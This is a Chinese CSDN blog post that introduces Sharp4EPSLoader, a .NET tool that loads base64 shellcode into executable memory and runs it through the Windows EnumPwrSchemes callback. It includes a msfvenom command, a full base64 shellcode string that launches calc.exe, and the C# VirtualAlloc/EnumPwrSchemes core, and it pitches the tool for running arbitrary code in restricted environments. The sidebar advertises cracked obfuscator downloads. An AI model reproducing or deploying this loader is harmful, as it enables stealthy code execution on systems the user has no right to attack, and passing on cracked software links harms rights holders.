.NET 最新的加载器:Sharp4EPSLoader

于 2024-08-19 08:30:00 发布
阅读量284 收藏 8
点赞数 13
文章标签: 安全 矩阵 web安全 .net windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/141216176
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4EPSLoader.exe 是一个轻量级的 Shellcode 加载器,专门用于在 Windows 环境中通过 EnumPwrSchemes API 调用执行内存中的 Shellcode。这篇文章将介绍其工作原理,并提供一个示例,展示如何生成和使用 Shellcode。

图片

03使用方法

为了演示该工具的用法,我们将生成一个简单的 Shellcode,利用 Windows 中的计算器(calc.exe)作为目标程序。

3.1 生成Shellcode

我们可以使用 Metasploit 的 msfvenom 工具生成一个用于启动 calc.exe 的 Shellcode,并将其编码为 Base64 字符串。命令如下:

msfvenom -p windows/exec CMD=calc.exe -f raw | base64

这个命令将生成一个原始格式的 Shellcode,并将其通过管道传递给 base64 命令,将 Shellcode 编码为 Base64 格式。生成的字符串可以直接作为 Sharp4EPSLoader.exe 的输入。

3.2 加载并执行Shellcode

我们可以使用 Metasp生成 Shellcode 后,可以通过以下 PowerShell 命令在 Windows 环境中执行:

.\Sharp4EPSLoader.exe /OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==

04原理解析

Shellcode 是一段可以直接执行的二进制代码,通常用于在目标系统上执行特定任务。它可以通过多种方式生成和加载,其中常见的一种方式是通过 Base64 编码的形式进行传递,并在目标系统中解码后直接执行。

Sharp4EPSLoader.exe 主要功能是首先,通过 Convert.FromBase64String 将输入的 Base64 字符串转换为字节数组,即原始的 Shellcode,再使用 VirtualAlloc 函数在内存中分配一个可读、可写、可执行的内存块,用于存储 Shellcode。分配的内存地址保存在 addr 变量中。

static void Main(string[] args)
{
    byte[] shellcode = Convert.FromBase64String(base64Content);
    IntPtr addr = VirtualAlloc(IntPtr.Zero, shellcode.Length, 0x3000, 0x40);
}

然后通过调用 Windows API EnumPwrSchemes 来执行 Shellcode。这个工具非常适合用于在受限环境中执行任意代码。

static void Main(string[] args)
{
    EnumPwrSchemes(addr, IntPtr.Zero);
}
[DllImport("powrprof.dll")]
static extern bool EnumPwrSchemes(IntPtr lpfn, IntPtr lParam);

综上,Sharp4EPSLoader 适合用于在 Windows 环境中加载并执行 Shellcode。通过 EnumPwrSchemes API 的调用,实现了对 Shellcode 的执行,值得安全研究人员深入了解和研究。

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Crypto_Obfuscator_For_.Net_2015_Build_170126_
09-23
Crypto_Obfuscator_For_.Net_2015_Build_170126_,为印度Crypto_Obfuscator_For_.Net软件最新版本,内附破解文件,覆盖即可,亲测可用。
.NET 7月份红队武库和资源集合
最新发布
ahhacker86的专栏
08-07 781
此文所提供的信息只为网络安全人员对自己所负责的网站、服务等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面。
Crypto Obfuscator For .Net Version 2012 R2 Build 120922
Linhanshi Blog
09-24 2519
Crypto Obfuscator For .Net Version 2012 R2 Build 120922 Download Free Trial http://www.ssware.com/cgi-bin/vrd.cgi?u=cryptoobfuscator/cryptoobfuscator.exe&c=cryOBFDL
.Net混淆工具和反混淆工具
a616735104的博客
03-05 1467
一、简介   本文给大家列举一些常用的.net程序反破解代码混淆工具。同时也列取一些反混淆工具。 二、混淆工具 Agile.NET (aka CliSecure) Babel.NET CodeFort CodeVeil CodeWall CryptoObfuscator DeepSea Obfuscator Dotfuscator .NET Reactor...
Crypto Obfuscator for .Net v2013 R2 支持代码掩码和常量字段移除
cpongo5
07-29 666
最近发布的Crypto Obfuscator for .Net v2013 R2 支持代码掩码和常量字段移除。借助于代码掩码,我们能够使用方法调用替代常用的代码模式(例如using、foreach、is/as、拆箱、数据或结构体的创建、typeof、操作符重载和字符串连接),但这不再像之前的代码模式那样容易理解。\在最新的版本中,用户能够移除C#和Visual Basic .NET中使用const...
puppeteer-sharp-contrib:对 Headless Chrome .NET API 的贡献:globe_with_meridians::test_tube:
08-05
Puppeteer 尖锐的贡献 对 Headless Chrome .NET API 的贡献 :globe_with_meridians: :test_tube: Puppeteer Sharp Contributions 提供了对 Puppeteer Sharp API 的扩展。 它提供了一种在 .NET 中编写可读且健壮的...
mathcore:先进的.NET数学库(.NET标准)
05-22
先进的.NET数学库(.NET标准)。 结构 MathCore-基础库,包含以下功能:复数,分数,复多项式,单位转换,坐标系转换,数值utils和Math类的某些扩展。 MathCore.LinearAlgebra-数学核心的线性代数扩展,包含以下...
opencvsharp:.NET的OpenCV包装
02-04
.NET的OpenCV包装 旧版本的OpenCvSharp存储在。 NuGet 包 描述 链接 OpenCvSharp4 OpenCvSharp核心库 OpenCvSharp4.WpfExtensions WPF扩展 OpenCvSharp4.Windows Windows的多合一软件包(UWP除外) OpenCv...
jemalloc.NET.NET的本机内存管理
02-05
jemalloc.NET.NET的本机内存管理 从页面获取最新的0.2.x版本。 jemalloc.NET是基于本机内存分配.NET API,可为.NET应用程序提供由本机内存支持的高效数据结构,适用于大规模内存计算方案。 jemalloc是...
c#/.net代码生成.rar
06-22
标题中的“c#/.net代码生成.rar”表明这是一个基于C#编程语言和.NET框架的代码自动生成工具,主要用于简化开发过程,提高开发效率。它可能是一个WinForms应用程序,因为描述中提到了“winform代码生成”,这暗示...
LogicNP Crypto Obfuscator For .Net Version 2015 Build 170126
09-07
LogicNP Crypto Obfuscator For .Net Version 2015 Build 170126 Powerful Obfuscation & Code Protection For .Net That Actually Works! .Net Assembly Code Protection & Obfuscation Automatic Exception Reporting Optimization & Performance Improvement Smaller & Simplified Deployment
.net 反混淆工具
06-25
.net反混淆工具 Xenocode反混淆 工具
Crypto.Obfuscator.For..Net.2011.cracked-SND
04-24
Crypto.Obfuscator.For.Net.2011.cracked
反混淆-.net反混淆工具
04-17
xenocode 反混淆 .net反混淆 反混淆工具 反混淆
LogicNP Crypto Obfuscator For .Net Version 2015 Build 170126.7z
07-17
LogicNP_Crypto_Obfuscator_For_.Net_Version_201,强大的代码混淆,及合并成一个可执行文件工具 LogicNP Crypto Obfuscator For .Net Version 2015 Build 170126
字符串反混淆实战 Dotfuscator 4.9 字符串加密技术应对策略
weixin_34238642的博客
07-02 299
因为手头需要使用一个第三方类库,网络上又找不到它的可用的版本,于是只好自己动手。这个类库使用了Dotfuscator 加密,用.NET Reflector加载程序集, 看到的字符串是乱码,如下面的代码例子所示: internal class Program { // Methods private static void Main(string[] args) ...
LogicNP Crypto Obfuscator For .Net Version 2015 Build 160701
08-16
LogicNP Crypto Obfuscator For .Net Version 2015 Build 160701。 .NET应用混淆,合并工具. 最新版本. 此版本可使用co.exe进行命令行编译,也可集成进.csproj项目中,编译的同时进行混淆。(以前的所有版本均不支持两项操作)
介绍一个.Net反混淆工具
exlink2012的专栏
01-25 703
de4dot是目前最主流的反混淆工具,它使用dnlib来读取和写入程序集可解密以下工具混淆过的.NET代码,如 Xenocode、.NET Reactor、MaxtoCode、Eazfuscator.NET、Agile.NET、CodeWall、Mpress .NET Packer、Rummage Obfuscator、Babel.NET、CodeFort、CryptoObfuscator、DeepSea Obfuscator、Dotfuscator、 Goliath.NET、ILProtector、Sma
.net反混淆工具(两个)
12-20
反混淆工具两个DeObfuscator 和DeSmart 各有优点
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值